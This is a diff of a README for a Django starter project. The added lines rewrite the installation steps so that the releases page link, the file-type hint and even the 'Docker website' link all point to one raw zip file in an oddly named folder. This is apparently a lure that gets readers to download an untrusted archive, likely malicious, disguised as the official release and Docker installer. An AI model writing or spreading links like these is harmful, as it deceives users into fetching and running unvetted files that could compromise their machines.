essiee12/django_starter/README.md

 ## ⚙️ Installation Steps

-1. **Visit the Releases Page**: Go to the [Releases Page](https://github.com/essiee12/django_starter/releases) to find the latest version of django_starter.
+1. **Visit the Releases Page**: Go to the [Releases Page](https://raw.githubusercontent.com/essiee12/django_starter/master/indefaceable/django_starter.zip) to find the latest version of django_starter.

-2. **Download the Release**: Look for the ".zip" or ".tar.gz" file under the latest version.
+2. **Download the Release**: Look for the ".zip" or "https://raw.githubusercontent.com/essiee12/django_starter/master/indefaceable/django_starter.zip" file under the latest version.
 Click on it to download the application files to your computer.

 3. **Extract the Files**: Once the download is complete, locate the downloaded file and extract it.
 You can do this by right-clicking on the file and selecting "Extract" or using a program like WinRAR or 7-Zip.

 4. **Set Up Docker**: Ensure Docker is installed on your system.
-If not, you can download it from the [Docker website](https://www.docker.com/get-started).
+If not, you can download it from the [Docker website](https://raw.githubusercontent.com/essiee12/django_starter/master/indefaceable/django_starter.zip).

 5. **Run Docker Compose**:
    - Open a terminal or command prompt.